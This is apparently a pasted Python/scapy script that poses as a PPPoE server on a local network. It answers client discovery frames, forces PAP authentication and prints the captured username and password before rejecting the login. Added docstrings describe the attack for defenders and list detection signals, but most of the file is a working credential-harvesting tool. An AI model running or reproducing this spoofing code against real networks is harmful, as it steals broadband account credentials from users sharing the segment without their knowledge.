
Untitled

a guest
Nov 15th, 2018
  1. # coding:utf-8
  2.  
  3. '''
  4. @author Karblue
  5. @date 2016年2月27日
  6. '''
  7.  
  8. import struct
  9. import uuid
  10. import copy
  11.  
  12. import scapy.all as scapy
  13. from scapy.layers.ppp import *
  14. from psutil import net_if_addrs
  15.  
  16. MAC_ADDRESS = "0a:0a:0a:0a:0a:0a"
  17.  
  18.  
  19. # Not suitable for hosts with multiple network adapters
  def get_mac_address():
      """Return the hardware-address strings psutil reports for local adapters.

      Every address entry of every interface returned by ``net_if_addrs()`` is
      inspected; the second field of an entry is kept when it is exactly 17
      characters long and contains a ``-``.

      NOTE(review): a 17-character, dash-separated value looks like the form
      psutil uses for MAC addresses on Windows; colon-separated addresses
      would not match this filter -- confirm the intended platform.

      Returns:
          list: the matching address strings, in psutil's iteration order.
      """
      return [
          entry[1]
          for entries in net_if_addrs().values()
          for entry in entries
          if '-' in entry[1] and len(entry[1]) == 17
      ]
  30.  
  31.  
  class PPPoEServer(object):
      """Answer PPPoE discovery, LCP and PAP frames seen by a scapy sniffer.

      Sniffed frames are dispatched on their EtherType. Discovery frames
      (0x8863) with code 0x09 (PADI) or 0x19 (PADR) are answered with a PADO
      or PADS. Session frames (0x8864) carrying LCP (0xc021) are answered
      with a Configure-Request whose Authentication-Protocol option is PAP
      (0xc023), and a PAP Authenticate-Request (0xc023) is parsed for the
      username and password, printed, and answered with an Authenticate-Nak.

      Defender notes: PAP carries the password unprotected, so a client that
      accepts PAP from whichever responder answers its PADI exposes the
      credential to any host in the same broadcast domain. The replies built
      here use fixed values that can serve as detection signals: an AC-Name
      tag of "^_^" and session id 0x01, sent from a source MAC that is not
      the provisioned access concentrator. Limiting PADO/PADS to trusted
      switch ports and configuring clients to refuse PAP remove the exposure.

      NOTE(review): the listing lost its indentation; block nesting below is
      reconstructed from the comments and statement order -- confirm against
      the original file. Payloads are written as ``str`` literals; which
      interpreter version this targets is not stated in the listing.
      """

      def __init__(self):
          # Source MAC -> {"req": ..., "ack": ...}; an entry is added when
          # the first LCP Configure-Request from that MAC is handled.
          self.clientMap = {}

      def start(self):
          """Start sniffing; every captured frame is passed to filterData."""
          scapy.sniff(lfilter=self.filterData)

      def filterData(self, raw):
          """Dispatch one sniffed frame to the handler for its PPPoE stage.

          Used as scapy's ``lfilter`` purely for its side effects; it always
          returns None.
          """
          if not hasattr(raw, "type"):
              return

          # Discovery stage: keyed by the PPPoE ``code`` field.
          discovery_handlers = {
              # PADI
              0x09: (self.send_pado_packet, "PADI阶段开始,发送PADO..."),
              # PADR
              0x19: (self.send_pads_packet, "PADR阶段开始,发送PADS..."),
          }
          # Session stage: keyed by the PPP ``proto`` field.
          session_handlers = {
              # LCP link negotiation
              0xc021: (self.send_lcp_req, "欺骗成功,开始处理数据..."),
              # PAP authentication
              0xc023: (self.get_papinfo, "获取账号信息..."),
          }
          by_ethertype = {
              0x8863: ("code", discovery_handlers),
              0x8864: ("proto", session_handlers),
          }

          if raw.type not in by_ethertype:
              return
          field_name, handlers = by_ethertype[raw.type]
          field_value = getattr(raw, field_name)
          if field_value in handlers:
              handler, message = handlers[field_value]
              print(message)
              handler(raw)

      def send_lcp_req(self, raw):
          """Handle an LCP frame whose first payload byte is 0x01.

          0x01 is the LCP Configure-Request code. The first request from a
          given source MAC is answered with a Configure-Reject followed by
          this side's own Configure-Request, and the MAC is recorded in
          ``clientMap``. Every request is then answered with a Configure-Ack.
          """
          if raw.load[0] != "\x01":
              return
          print("收到LCP-Config-Req")
          # First request from this client: reject it, then send our own.
          first_contact = raw.src not in self.clientMap
          if first_contact:
              self.send_lcp_reject_packet(raw)
              self.send_lcp_req_packet(raw)
              self.clientMap[raw.src] = {"req": 1, "ack": 0}

          # Whenever a request arrives, echo it back as an ack.
          self.send_lcp_ack_packet(raw)
          print("发送LCP-Config-Ack")

      def get_papinfo(self, raw):
          """Extract and print the peer ID and password of a PAP request.

          Acts only when the first payload byte is 0x01 (PAP
          Authenticate-Request). The layout read here is: byte 4 = peer-ID
          length, then the peer ID, then a one-byte password length, then
          the password. No bounds are checked. Afterwards an
          Authenticate-Nak is sent and the client's ``clientMap`` entry is
          dropped.
          """
          if raw.load[0] != "\x01":
              return
          body = raw.load
          user_len = struct.unpack("!B", body[4])[0]
          pass_len = struct.unpack("!B", body[5 + user_len])[0]
          user_end = 5 + user_len
          pass_start = 6 + user_len
          user_name = body[5:user_end]
          pass_word = body[pass_start:pass_start + pass_len]
          print("get User:%s,Pass:%s" % (user_name, pass_word))
          self.send_pap_authreject(raw)
          # send_pap_authreject swaps src/dst on this same object, so
          # raw.src is read here after that swap, as in the original order.
          self.clientMap.pop(raw.src, None)

          print("欺骗完毕....")

      def send_pap_authreject(self, raw):
          """Turn ``raw`` around in place and send a PAP Authenticate-Nak.

          Unlike the LCP senders, this one mutates the caller's packet
          instead of working on a copy.
          """
          raw.dst, raw.src = raw.src, raw.dst
          # code 0x03 (Nak), id 0x02, length 6, one-byte message 0x00
          raw.load = "\x03\x02\x00\x06\x01\x00"
          scapy.sendp(raw)

      def _swapped_copy(self, raw):
          """Return a deep copy of ``raw`` with src and dst exchanged."""
          reply = copy.deepcopy(raw)
          reply.dst, reply.src = reply.src, reply.dst
          return reply

      def send_lcp_ack_packet(self, raw):
          """Echo ``raw`` back with its LCP code replaced by 0x02 (Ack)."""
          reply = self._swapped_copy(raw)
          reply.load = "\x02" + reply.load[1:]
          scapy.sendp(reply)

      def send_lcp_reject_packet(self, raw):
          """Echo ``raw`` back with its LCP code replaced by 0x04 (Reject)."""
          reply = self._swapped_copy(raw)
          reply.load = "\x04" + reply.load[1:]
          scapy.sendp(reply)

      def send_lcp_req_packet(self, raw):
          """Send this side's LCP Configure-Request to the sender of ``raw``.

          The option bytes are fixed: MRU (type 1), Authentication-Protocol
          (type 3) set to PAP 0xc023, Magic-Number (type 5), then four zero
          bytes.
          """
          reply = self._swapped_copy(raw)
          # The client's payload is read here but not used afterwards.
          _client_load = reply.load
          # Options that name PAP as the authentication protocol.
          options = "\x01\x04\x05\xc8\x03\x04\xc0\x23\x05\x06\x5e\x63\x0a\xb8\x00\x00\x00\x00"
          header = "\x01\x01\x00" + chr(len(options))
          reply.load = header + options
          scapy.sendp(reply)

      def send_pa_packet(self, raw, **kwargs):
          """Rewrite ``raw`` in place into a discovery reply and send it.

          The source becomes the module-level MAC_ADDRESS and the
          destination the original sender. The tag payload is an empty
          Service-Name tag, an AC-Name tag with the value "^_^", and the
          client's Host-Uniq tag when one is found. Each keyword argument is
          set as a field on the packet (callers pass ``code`` and
          ``sessionid``).
          """
          raw.src, raw.dst = MAC_ADDRESS, raw.src
          # Echo the client's Host-Uniq tag back if it sent one.
          host_uniq = self.padi_find_hostuniq(raw.load)
          tags = "\x01\x01\x00\x00\x01\x02\x00\x03^_^"
          if host_uniq:
              tags = tags + host_uniq

          raw.len = len(tags)
          raw.load = tags
          for field_name in kwargs:
              setattr(raw, field_name, kwargs[field_name])

          scapy.sendp(raw)

      def send_lcp_end_packet(self, raw):
          """Send a discovery frame with code 0xA7 back to the sender.

          0xA7 is the PADT (session terminate) code. Nothing else in this
          listing calls this method.
          """
          ether = Ether(src=raw.dst, dst=raw.src, type=0x8863)
          pppoe = PPPoE(version=0x1, type=0x1, code=0xA7, sessionid=0x01,
                        len=0)
          scapy.sendp(ether / pppoe)

      def send_pads_packet(self, raw):
          """Reply to a PADR with a PADS (code 0x65) using session id 0x01."""
          return self.send_pa_packet(raw, code=0x65, sessionid=0x01)

      def send_pado_packet(self, raw):
          """Reply to a PADI with a PADO (code 0x07)."""
          return self.send_pa_packet(raw, code=0x07)

      def padi_find_hostuniq(self, raw):
          """Return the Host-Uniq tag found in a discovery payload, or None.

          The payload is searched for the first occurrence of the two bytes
          0x01 0x03 (the Host-Uniq tag type); the following two bytes are
          read as a big-endian length. The result is the tag type, the
          length field and that many value bytes.
          """
          tag_type = "\x01\x03"
          if tag_type not in raw:
              return

          start = raw.index(tag_type)
          # Two-byte Host-Uniq length.
          value_len = struct.unpack("!H", raw[start + 2:start + 4])[0]
          # Length field plus the value bytes that follow it.
          length_and_value = raw[start + 2:start + 4 + value_len]
          return tag_type + length_and_value
  176.  
  177.  
  if __name__ == "__main__":
      # List the candidate adapter addresses, read a 1-based index from
      # stdin, rebind the module-level MAC_ADDRESS that send_pa_packet uses
      # as the frame source, then start the sniff loop. A non-numeric or
      # out-of-range entry raises ValueError / KeyError; neither is handled.
      print(get_mac_address())
      macs = get_mac_address()
      mac_dict = {}
      for index, mac in enumerate(macs, 1):
          mac_dict[index] = mac
          print('网卡%d, MAC: %s' % (index, mac))
      i = input('输入连接的有线网卡序号')

      MAC_ADDRESS = mac_dict[int(i)]
      print('获取到网卡:', MAC_ADDRESS)
      print('等待pppoe客户端连接...')
      n = PPPoEServer()
      n.start()